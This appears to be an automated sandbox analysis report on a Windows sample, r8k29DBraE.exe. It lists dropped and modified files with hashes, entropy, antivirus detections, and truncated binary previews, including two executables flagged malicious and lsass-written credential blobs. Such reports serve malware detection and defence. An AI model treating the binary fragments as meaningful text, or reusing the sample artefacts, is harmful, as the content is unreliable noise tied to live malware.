                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:p/4TmJ6disGipZuGasyXOJEZZTcwxCXYDkAsIviv7ISviMEQnwvJO3pzF1qyJ4Tf:pAqXGpb6rGYHikWxsO5HfJ4Tf
                                                                                                                                                                                                                                              MD5:52A427A42BBFD0818A5367E6B1EF77E7
                                                                                                                                                                                                                                              SHA1:79350A94B4E867AC768CBDF900B02DEB5E0C0C59
                                                                                                                                                                                                                                              SHA-256:E2C25CD987145AC52B1AC6F06750237CBB8CDB84CBDABF74B493704182C93AFA
                                                                                                                                                                                                                                              SHA-512:2D7EB5CF609BE3E8D9533E08D111B2335213987D3DF4B5EC2C52A3D9279847B12D0ED2B1FAB6BFE0A3A3633C941EE33DF9BC55D172234C1D29F4F83C39837376
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:.....+..................z..O..........9e.D.j...h..... 0...L.o.c.a.l. .C.r.e.d.e.n.t.i.a.l. .D.a.t.a........f...... ...Vj3.U..",[l3.\..v..r.e=.................... ..../......Y*8Q.o....K..VLu.}.......*....~4..~].$./..0.....3...a.;^.:.....h!...:.I.d~Y.P.H7...f.*......^...}Qa.+.E..._`......-..w.....Bq.C..$....0...F.....&4..U....@+.[$...I..\..U.S.._.?.wQ......-...9(.....7....3.m.hd;W..P...oLOd^.{c./....s~...*.0...\.....%..".h!....f*.w.F.1.H.l.a3.......U....l.Cr7H..2......W.R0......M...9x..w.r....Ig1.m.C..`.\.k&..A!..U.qr.A...?2.Gm.............:W...Ee......M...*..P.$..Y..KC.d.1..A...-OrQN9H..Z...m...j.H.W.. .i}...mFO-L..zd..#....j.....@.q~..Q...Z{.*.N....#.W.|..Ny+.."...m%\h...P.y.-..+..."i....u...Z..'zI4w....1Wr.4..t#...W..:..j~.}E....y.5+.B.uu......d..ev."mT..w......3...;.#n....o@.....xd.........Ap~..<l.w....r.. 0ZR.j.g....Q~.~..-.v..n.].7F...#........eWj......../.`.8+....Z.\*...q-"..^..m......L0U2.&}Vj....I.V...1mU...Z`BH. ......t......QG..O{^.As.
                                                                                                                                                                                                                                              Process:C:\Windows\System32\lsass.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                              Entropy (8bit):4.501629167387823
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:xMoaBj:qoaBj
                                                                                                                                                                                                                                              MD5:E95CEB364BD1600750A30F77482D089D
                                                                                                                                                                                                                                              SHA1:025826D55E0BEBF0B6B433B32659193D5ED5A411
                                                                                                                                                                                                                                              SHA-256:13DA13123B9255B88D76BFD003D8936E99A400860C4B34FC111CD78F99650441
                                                                                                                                                                                                                                              SHA-512:A1028EEA950E2DE33554260BB1745DB3B03C781FAF7963D7255C907FBAEBE91CA4357C58630D3F682B6AD9C1FA2EB9F0446FC60E17E339DFD6364B9CF6679B4F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:....9e.D.j...h...+i.e..
                                                                                                                                                                                                                                              Process:C:\Windows\System32\lsass.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):468
                                                                                                                                                                                                                                              Entropy (8bit):6.407805178616268
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:brY7uyCgQn3LZTUdKszfvbuCSZ46Ej0/cABO:suQq5kfvatGdHABO
                                                                                                                                                                                                                                              MD5:7433783060BDAAE0C08EBA02E5CA982E
                                                                                                                                                                                                                                              SHA1:D409264EF420D51EB29EDEEC54E60B73BD307AB6
                                                                                                                                                                                                                                              SHA-256:059F6820A5CB31D76446242E1B81B77DBE54F0A5D514AADA657F689BFF03E5EE
                                                                                                                                                                                                                                              SHA-512:B8AFC4CC1648FDAE2BD47777E54F15DBAF781E21C71737057DE997F43169BB3FAA3F427A228D4D75AE7A6E4FDA4594F8761BC3A5AA4755933B51D3AD412B6DA8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:............c.5.d.6.8.a.1.c.-.6.5.3.9.-.4.4.8.b.-.b.7.6.a.-.9.b.f.d.f.8.6.8.c.e.0.0.................................................W.....F...Y.....@........f..n.2..G...sk.....L......\....-..$!.Z7#..h...\..kK.j......L.m..#ZI....yU..S.PN..o4Z.8...J....R...>.T..5Qe..4"..E....f..z.(.B(.......Z....L+....n|.k...sE....'S@........f..B*.).;....>nz\..].}..+w....!.8...ec8..{..*~.Z.V.9In..........fs.n4%.`..{.PW^.&z..g.H..TF0.....6......./......@..1.=OL....X.k
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\r8k29DBraE.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):34816
                                                                                                                                                                                                                                              Entropy (8bit):7.415585647348422
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:sokC1JY3bft56FUqKCnhhrqIvji1QuUkJV3NksbRY4ChV:ICgLt56GCnXemi1QuLV3bbRAV
                                                                                                                                                                                                                                              MD5:64FFE7C0FA6AC22F5ACAFD3CEB4ACA5B
                                                                                                                                                                                                                                              SHA1:104182708267EE1A6DA0E9E83CB04DF83EDAE120
                                                                                                                                                                                                                                              SHA-256:6B5C2E9A2EF36412B2636236ADE5530C59573B51B07FE224FD980911CBB7B976
                                                                                                                                                                                                                                              SHA-512:F136D69BB6BE51CF7E1E6F0E4538CB951337CB278344B348E749F67A6F08C1DF01264BD3275ED9A36B776DFB1B9B75F31F8BCEC102F8B50D50913AA883B13066
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...;.Lf.................~..........N.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...T|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................0.......H.......8................%..m^............................................(....*..(....*.s.........s.........s.........s.........*..(&...*b~....,.~....o0.........*.(U...oV...oW........r...p.....r...p.....r#..p(X........*.0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............( ...(!....+..*....0...........("....+..*..0...............(#....+..*..0...........($....+..*..0................-.(...+.+.+...+..*.0..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\r8k29DBraE.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):165376
                                                                                                                                                                                                                                              Entropy (8bit):5.879250179552107
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:bc28KbSCtn8Mo8G1gVziHzZbIK1YKB/pCA8tqXhwBV3yxSQig8xN:bX5bsgVziHzZnSKrC7IM
                                                                                                                                                                                                                                              MD5:A69C6E092D415063A9FB80F8FE4E3444
                                                                                                                                                                                                                                              SHA1:8B26A0FD01B1E48F7110CFFECF6BC3B9D0822E9A
                                                                                                                                                                                                                                              SHA-256:F7DD8D6299C108A3221C31BF33637F59F0E19703AAA88B1E3A4F1093E7209A5D
                                                                                                                                                                                                                                              SHA-512:4E69B49D65F68FF913AFBC991F06509645AC69850182F557CA625AD5CF92832059DDADB4AF547CFB4FD84C4B24CF55A1CE3D9D6D466112E9581908D4E4D2DA38
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                              • Filename: wzcstatus.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$........K...*..*..*...R..*...R..*..*...*..p...*..p.7.*..p...*..Rich.*..........PE..d....0f.........."....'.....f......P".........@..........................................`.................................................D8.......p..`N...`..8...................X5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......4..............@..@.rsrc...`N...p...P...6..............@..@........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\lsass.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):468
                                                                                                                                                                                                                                              Entropy (8bit):6.235848758957034
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:SjIVl1102GTnsc5a98YaU9+qZup9/VJSB:SjIbpGTha98YqBA
                                                                                                                                                                                                                                              MD5:56F7EEEB88A200BE3FF4BAD1293F0BF8
                                                                                                                                                                                                                                              SHA1:B1137994999EE63E644605EFBC4DB1F0612E58FC
                                                                                                                                                                                                                                              SHA-256:28EB63CF7A89B6C34262D8A564E5DD9FFA355A5AAECAA6F336DCD1A64C7AA711
                                                                                                                                                                                                                                              SHA-512:CE7FF74D3BA7644E0171A05D27944C88328EE1F7B9D3365F9CEAC7F42E423C2A5D3EB1776F84136E9FEAAD0C48A04C8901AC846181664B9C04DA68BD514CF71A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:............7.4.1.5.a.3.2.d.-.d.2.c.0.-.4.e.8.d.-.9.4.3.e.-.3.e.8.1.7.e.4.b.f.8.9.4....................................................6j.E+.3F.bt@........f........y.r^(y..O.........._..C....o.7...#.Nv.g.......ex...R.(3U./.o........H...IS.933.....I.;...mA.?-.W.z.\.Ph@FcRQ....S....z..'.u5y$.9.........?G-..#.I7.!..y@........f...V.....<..".I..}..u..|C.'...>(\.3..PNp=...~...........{b...+w...t.,3..A%.G.....`.e.I.....X.~...h^..E.|6s.....................

Process: C:\Windows\System32\lsass.exe
File Type: data
Category: dropped
Size (bytes): 24
Entropy (8bit): 4.334962500721157
Encrypted: false
SSDEEP: 3:0rotZ1rn:xn
MD5: D973DD8B7ADBDA21BA96B633841F5F63
SHA1: CEB1B9CA94810B99C831BC3A5157507F4C895794
SHA-256: 4005C2260364E313B8E84E0588A097880882DA5883CE85DE66C01057388A3F2D
SHA-512: 23F649C4CAAF92FDCB8D9E164DB122767BF04BC316C1EB3FFD4247276C48A2A1EC6F00E654B7C59BABE76BC78FF45DE8D71137260C1459D0AFC090BC11C07C35
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: modified
Size (bytes): 4680
Entropy (8bit): 3.7109755968304836
Encrypted: false
SSDEEP: 96:pYMguQII4iD6h4aGdinipV9ll7UY5HAmzQ+:9A4r/xne7HO+
MD5: B5F9A40045F64DBC85D6B624E358B099
SHA1: 2E8F61AED6AC6EEECC5D3D534307DAB97C7F220F
SHA-256: A7BDFB7537D14F25EF2B115809280C818C1D205565DA38B9E41F988D12262F67
SHA-512: C5BE81044208CB67EF8184B90255BDF2C40A7432F795F7354F0DBD8BABC778F8CAD9AFB5D99D3E8E4938DE9E913A70C8A4BF65A7FC3166C96D3AAE36E382244D
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: modified
Size (bytes): 338
Entropy (8bit): 3.9473632624648336
Encrypted: false
SSDEEP: 6:kKPPN/xSwfsJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:3PNJHkPlE99SCQl2DUevat
MD5: 6941EF983D17C3A23A8F7E7B72B3A7FA
SHA1: 92CDD0FD9F56AB9B32F2F104E13911019030EFD2
SHA-256: 235D3A6D0B9825823B8CCD5B1E653F0006DDD5AB2D16FF933B6AC6619FF17029
SHA-512: 006F37DFAB762078577CD8A1B94F66B68700A0485B1C5697FBBA32320A8F89857F0969F22024AA4198E3DE970CAFF19D5F911209D3AE4824CDF6FBA77BA7F423
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 412
Entropy (8bit): 3.947821269449896
Encrypted: false
SSDEEP: 6:kKl+ElvXJtRMhlXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsbhQ6Shlrn:sMjRamxMiv8sFFKbpgal7BlwhZg
MD5: 2BC366BE27FC83D0183010EBE49033D6
SHA1: 78F79A05C2CA7DAD133187D199D4F1F86EA4B845
SHA-256: 9AB8673DC8026093AC5F29C1073CFADFE1C53298D7A525F26F20A844FDA0B17E
SHA-512: 8B36EDED02BB3D35AC373207FBDEFCE8DED7FBBE00A341689AA4F9BA709D610F861C3983CD4356997CEBB9780761DBD20DAF9D5EAE88BB406255120504598141
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 330
Entropy (8bit): 3.44091390511185
Encrypted: false
SSDEEP: 6:kKqbN/Q8Qts8uScN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:ybyXvkPlE99Si1QyIeek
MD5: 2E035D7652D5FCDAD140D10CC564683C
SHA1: CF00EE365FF689DCD5B360EA4AFF258A4A85AB05
SHA-256: 14417F33BD06C972F4E8752F32A8BF29EA1797CAB5D452E715503936D7C7649C
SHA-512: 677C997AEF70E89B8089C1F7D4A8DFCAC93871D01FB518D83947AC6457C537F4F44091E5A0877CC489D8712C8F2A0151D1586B5CD077F1B16BDCF8636EF84F27
Malicious: false

Process: C:\Windows\System32\lsass.exe
File Type: data
Category: dropped
Size (bytes): 11136
Entropy (8bit): 7.976827303688481
Encrypted: false
SSDEEP: 192:a5MLemrawF1kQrwNrtpawH5msA524XqTzs+ZkSKxUUP9Ba6CGlXze:qmr7XwVtAwH5Lekw+ZkSKxUsBa/Gde
MD5: 5A57A1597471995F12CBA668B5C4795F
SHA1: DC6ECCC78CAA5B0A28371EC06173632E72AC627C
SHA-256: A3A49373027B5B69CCF7BD9309906D2EBFC0351ED21E995771DCCE99D45B6C8A
SHA-512: 07923346DC9B74A79F8A25E86B1904860C7929909FA46013B1D27279D1681C561F958E60B6C13CBF42268AA24E186B1BB216843156D47824FD661EEE1D675B25
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 75840
Entropy (8bit): 4.04400451007821
Encrypted: false
SSDEEP: 768:fHdL+9/GHdL+9/+gZcobTgNAbP5AAKP5qf5AKP5dfvoXfSPfm4fGfuszpfn8VHd6:fpgcG3bPNKPTKP3GbzF8V4
MD5: 032702E177AB5F8EC6EA4F985967E96E
SHA1: 02AE727EC3CF0D2C1F8B8EC281A70AF29D614E77
SHA-256: C2288455A2DCB028DE5A60DB346D14766CC63EE37B32312AB9678D0648E33132
SHA-512: D09EDB956A79F83495DE2256924ECC44F4EE07348A006834B570347FE6E5E626FD3722F971DF33BE8C58288F2EDBE5C4380E196A69A4493F151700A3B30E09F5
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 329, DIRTY
Category: dropped
Size (bytes): 60248
Entropy (8bit): 4.274650822586721
Encrypted: false
SSDEEP: 768:mVUHiapX7xadptrDT9W84Gq4dGnMltZtgc2V:5Hi6xadptrX9WP+gj
MD5: F0AEAFBD5ED56C55EB3642E118D4A28B
SHA1: 39F8DA3F039281D87E3569813277D8E6D9DB5D8C
SHA-256: 45764D71B62D1C8D5778B1CABF316A315C5D9FD4C8E8F6BC61BAB9D731EAEC6A
SHA-512: 23563CE6EA9272CD9D6BD897816A9C1D9217B1498807952F1F0A24BAE4186B90F72AE1C8B288B7F949F72AA727C6EBE0430FAE6B58C080422377D13BE67B2CAF
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 4.396148699263237
Encrypted: false
SSDEEP: 384:jhONk2SCNCrN0KNoBNoiNKNosaNjN4N9NRNCN8NoNjNUNONXN6N6LNvgN1NkNWzP:jgS5itAsZ2DCIEzVFNtPp
MD5: 1714E9F375BF402E9FF7644ED82EC285
SHA1: ECB3A4495CEBE4F270C8D94553F027A36F50C42B
SHA-256: 20C6A11A8C455A4E4077CC61001BED7C0DD4E6F4FAADBCAD8DDF9A31406F1051
SHA-512: A376B10C14E4EF653991874DE0D730768CC8D9BD49D8C348EED40CD184DA0C2AB47022B0AF6841B0F260598927C63271550A9B2C30F6A0DB1F6A3F830FC16576
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 114256
Entropy (8bit): 4.286852287662972
Encrypted: false
SSDEEP: 384:zV1VbVrVmViVQhpVAVqVjVWVscVcVtVrV51VgVTV/VZVXKVNVjVyVlF/vVIVtVQg:eb8xf4BsuMgkAu4HtWb8xf4BsuMgkSg
MD5: 824AA036B8D3A5BAF9EA9CC09834DB43
SHA1: AE5A5B0FDFBBF93770D90AFF9CD1E0D9FF9BD227
SHA-256: 122EF898253E610CB1EF2CDCE5DE8F56605A3359B95E763BAECE623066F82242
SHA-512: C0E9170D2A51EA8B421EAEEED81BC9C367404CD784FA6093EEC86760C9D226EEAADCE9E773A61C2179863EE1DF31341AF484562A65553F9B02760B8BF4A919EA
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 67008
Entropy (8bit): 4.403044813023599
Encrypted: false
SSDEEP: 384:OmWmUhImkmAymRvmVkcmhTiYmBmgmUmWmBmbm4my7mcEZmZmtmZ4mRmKmdm5mqmH:kxkrTiZz+9hZ/07TSPnSKn
MD5: 966D50E70BEBD58019FAFEA5B2E0914E
SHA1: 0361B64837AB18ED25992C318B9C9AAF372D1240
SHA-256: 24DA15A3502B41AD670C9023D4700853CB78EB432E3C108878905D008CB6EF3C
SHA-512: B5BA5B66A035A7EA5F5AAD6D5D778A929A59D5D5FA102F0B08BA5F275A8A18E4DAA8B5F3DDC3ADF05EAA85F804EFDBB9341FDCA77C9171ADCF3B09B5BA2E9B56
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 4, DIRTY
Category: dropped
Size (bytes): 70680
Entropy (8bit): 0.7903575080200846
Encrypted: false
SSDEEP: 192:P5V7pp8nMLEvUp8nDp8n+p8n/V7pp8nMLEvUp8nDp8n+p8n:P5hpiMLE8iDi+i/hpiMLE8iDi+i
MD5: 0F7251888C86C1377D28856339658EFE
SHA1: C320B9AE7D8A914EAAE7E5ADA5904E3BA82F6D4E
SHA-256: 64DEA24E988DAC8B66B4C6E0EC5247DB90519D6376AE38C3EA7F5FE3A0317EB2
SHA-512: B63C22AC91A23861BD827A29FFC63B6FD6E51244A29EBB731AFC1B60F9DF10C520D5F6F73445888C26D171CB61A6343B0007FACE22CE739FF5B3A73EE06133E8
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 4.248110473220085
Encrypted: false
SSDEEP: 1536:YbBN2A4VD7VAx8whAGU2woJQghYAxgRzAlUnF9:
MD5: 87681F2AD6FCB19982924DCE6A2D7A27
SHA1: 6C4D49C5504D6DE6E63B44753C607B3362B79B57
SHA-256: 1CA289F8F7FD7DD1D67EDA5691EF4B083120E456204CC8F6923AFCCD700183BC
SHA-512: 8F1309E5DD7B017945ABF5EB7E869AA1C04A27C37DB7C3A735A2CB31D815B67643D37DAD93FB89FFF2B6BC213EAE1E55201075DAEAFA39A6B1656A214990DEBA
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 4.625347651139654
Encrypted: false
SSDEEP: 1536:+XY5nVYIyyqED5BVZUevOBtNPhPVwCRPvf:+XY5nVYIyyqED5BVZUevOBtNPhPVwChf
MD5: 890CA9963C766DA05E491710E1CD9D7F
SHA1: 3F95AB4363D5DB533E60748F69A364196BAC8920
SHA-256: 47523E0AC40BC366CD0A86BE9A72ECEF3A72EE7D430B25A61D8DF55341C19531
SHA-512: C2D739AE5ABF76C627DA8B863CC73FF31F7C7733138DB2954A3102377FD0270F69FE269EEAE0DE4172E53E194C3B71791CD09B36F880DC726665004FD9C6A07F
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 93888
Entropy (8bit): 2.1543940208133274
Encrypted: false
SSDEEP: 384:afoEK+oy6hdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorBort6ohorRg:lDCRMDCRoBI
MD5: E5292F0D91E3AD9B0F116E3C83A17698
SHA1: D77FB65F6AD273A241117E842643E1F4417EB371
SHA-256: DBB09D596B8329C1BF123755024DC16D4E2B2B197327A5DF2FF99C93E6231BAE
SHA-512: 6FA98EF05315A8DCC122232E81EF5A62464E1ADF55AD673C7FEBF683CADC64E475DE3205A5DF46186A188D7BECEB382E8A2AC7049EB67B25DDE0DEC7282F82B3
Malicious: false
Process:C:\Windows\System32\svchost.exe
File Type:DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 207715216474546355539665747968.000000
Category:dropped
Size (bytes):65536
Entropy (8bit):0.8526226240352849
Encrypted:false
SSDEEP:384:YhAiPA5PNPxPEPHPhPEPmPSPRP3PoPqP7DPfPqP/P:Y2NP
MD5:585F5E645713292DF375B49B2BDC28EA
SHA1:42531DC7FEDA50E16705A1260EC70B5AD7015FCB
SHA-256:E16C3A02C9E22074AE98621BB170E12D41A54187FCC6D53B5600F5712F37A9FF
SHA-512:0C0008188EC621D5FE00CF9211729347A941AF2DE55DA3333114D83B4D181FB8792C64FA0F62309660F51FF26349684D35EAC0A4E0FE98898D1C03CAAB65B434
Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk......................................%...&...A..................................................................... p..................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.8442469423268683
Encrypted:false
SSDEEP:384:DhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lk:DWXSYieD+tvgzmMvB2R387
MD5:A12D2A18D158FA0E4EBA801B76795EAC
SHA1:22C6C36D8E0ACD32735F5C0D25929CD734A2DB9F
SHA-256:4A2A9FFE44AB14DE2504B3632FBDDC8EC4E3B35AFF6C5CCA75AB5095E164E39E
SHA-512:729117B98F2FA8D18DD3A9B0A373EA5CD36A9B88BA54A45579DE0C50C68DABAB50096CC3078DDA1C11A7483D95CD6B39A54AF35282B1C2550F0AAE4A80F8BEA9
Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk......................................$...&.....i....................................................................x..(................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................&...............................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):106664
Entropy (8bit):3.839330675778791
Encrypted:false
SSDEEP:384:ONhShqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqk:OWbCyhLfI931dWbCyhLfI931dS
MD5:4F1D27F2D8E307F851E32537D0332FC9
SHA1:342B9959D581152295FF17FC1701538BC85296A9
SHA-256:DB1C54697337BA1D3E73E6ADC88C78186619FD2A7AE03DD63DD1F3CCB3975F9D
SHA-512:00FFACFCC7D6AC11775274843427AA8B7A4AF2CC74328AFEF84C51E81260D9989C04FCA16C590B24A6A7C964FA6D03C07E827AFDE138C0C1D3C018EF5826FE8D
Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........N...............N....................f......................................................................W...................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n.......6t..............................................................................**......N.......k.nk............E!6t..............................................................<.......T.....!.................k.nk.......`...Z..`...x.......N....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I.@.....NF.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I./.O.p.e.r.a.t.i.o.n.a.l....0.............`....0.....J.o0..;..C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.i.c.r.o.s.o.f.t.\.P.r.o.t.e.c.t.\.S.-.1.-.5.-.1.8.\..............
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):66528
Entropy (8bit):3.4133176467502055
Encrypted:false
SSDEEP:768:/4cMhFBuyKskZljdoKXjtT/r18rQXn8uwgSj70FTP1:/tMhFBuV80r
MD5:38E8082F2CC552B66263BEDC525A24C2
SHA1:E533467CEEFE758FAEA3CE8D131EFFFF4DFF692A
SHA-256:AD8DCED9309E2F498D2240DE664A7ECBE05BAE55777554F6A4E8FF1992F61825
SHA-512:B3BAD450CBC08737ABF4A2FFC24CCC00D2B539C26A5D61918C078D2D7B1295E1244F24183EAEEA399D863BF05235C67F46D16BC9585684070648703219B5C8B8
Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........P...............P...............h...%.......................................................................>.5.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**......P.........x............E!................................................................>.......V...y.!...................x....~..-4..A.e3.L...x.......P....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.N.C.r.y.p.t........E..3...pM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.N.C.r.y.p.t./.O.p.e.r.a.t.i.o.n.a.l....M.........F...........M.i.c.r.o.s.o.f.t. .P.l.a.t.f.o.r.m. .C.r.y.p.t.o. .P.r.o.v.i.d.e.r...0...l.s.a.s.s...e.x.e................ElfChnk.
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.900320443969457
Encrypted:false
SSDEEP:768:/tvigwV4kvAzBCBao/F6Cf2SEqEhwaK41HZalMIq9Iz6IOTLGfFXN/E:FzH+dqWzrhFXN/E
MD5:628E6FD6542F9330AA4922256F7F8CA3
SHA1:16DF4B2D6201E9E8A8CBFDB64CADE2C5E91C6491
SHA-256:B63F81272D5118AD62FAE5E4A2BAC1F9982EE927C93C7D90811B748D5C87781A
SHA-512:CC023AEA9F4BB02B8BCC5C6DC3C2ABDEEEA487AD47475A1B5C13F854BB4B50E6001AEB07A10D8035CF8DBA0FD848F91B4DB4F82F2462A0E9559D033F80C87C09
Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.w...............w............................Q.1....................................................................YW3.................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..H...w...........`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
Process:C:\Windows\System32\svchost.exe
File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 27, DIRTY
Category:dropped
Size (bytes):93416
Entropy (8bit):2.772302898242841
Encrypted:false
SSDEEP:384:2rh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkz3:oMAP1Qa5AgfQQhCUMAP1Qa5AgfQQhC
MD5:2CB054BF7C8FC97367BFA78469ABAB31
SHA1:312FEA2127B96A9077BB3D864C00550F045F69A9
SHA-256:0B20CD6B6BF6095B4BD064A9364A45AE90F1511103B09F13DEE7B05C8E2A342B
SHA-512:8B7DDAA8C21FC9AB7F55E5FBD42E101271059A68BBAA026A6B649E0C9C080D1701518D2F301B631C20DEA1108F8421211D74A685CA62E2AD5A1DE21B3CB921E8
